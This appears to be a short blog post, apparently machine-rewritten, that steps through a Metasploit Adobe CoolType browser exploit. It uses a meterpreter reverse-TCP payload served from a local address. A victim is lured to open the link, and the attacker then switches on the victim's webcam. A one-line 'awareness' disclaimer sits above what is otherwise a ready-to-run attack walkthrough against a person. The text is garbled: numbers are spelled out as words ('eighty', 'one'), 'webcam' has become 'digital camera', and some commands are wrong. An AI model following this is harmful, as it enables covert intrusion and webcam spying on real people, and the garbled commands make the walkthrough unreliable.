Our real purpose is to indicate simply however simple it's, therefore you may take higher awareness that it are often done, and take security yourself.
Open Metasploit and run following commands:
msf> show exploits
msf>use windows/browser/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing)> show choices
Module choices (exploit/windows/browser/adobe_cooltype_sing):
msf exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf exploit(adobe_cooltype_sing) > set SRVPORT eighty
SRVPORT => eighty
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf exploit(adobe_cooltype_sing) >exploit -j
Let the victim open your informatics in his/her browser and once it'll be opened, you may get one meterpreter session.
msf exploit(adobe_cooltype_sing) > session -i one
meterpreter> run digital camera
and you may get the digital camera of victim. :)

No comments :
Post a Comment